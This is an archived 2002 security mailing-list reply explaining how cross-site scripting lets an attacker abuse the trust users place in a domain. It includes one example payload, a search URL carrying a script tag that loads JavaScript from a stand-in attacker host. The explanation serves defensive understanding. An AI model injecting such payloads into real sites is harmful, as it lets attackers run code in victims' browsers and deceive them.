Hosting Provided By

Re: XSS

From: Stephen de Vries <dv8(at)omega.arcbox.com>
Date: Wed Dec 11 2002 - 06:00:02 EST

The real probelm with XSS is that an attacker abuses the trust that a legitimate client has in your domain. An attacker can execute ANY javascript (or HTML) under the guise of the trusted domain, if a script in that domain is vulnerable to XSS. For example, an attacker can use javascript to rewrite an entire HTML page, providing false information under the guise of www.trusteddomain.com/search?<script src="www.attacker.com/myscript.js"></script> thereby subverting the trust that clients put in your domain.

Stephen.

On Tue, 10 Dec 2002, John Madden wrote:

> Hi All,
Received on Wed Dec 11 10:16:42 2002

This message: [ Message body ]
Next message: Mads Rasmussen: "ENC: W3C XML encryption specs approved"
In reply to: John Madden: "Re: XSS"
In reply to Matthew Miller: "Re: XSS"
Next in thread: Ed Tracy (at) Aspect Security: "Re: XSS"
Reply: Jeff Williams (at) Aspect: "Re: XSS"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:46 EDT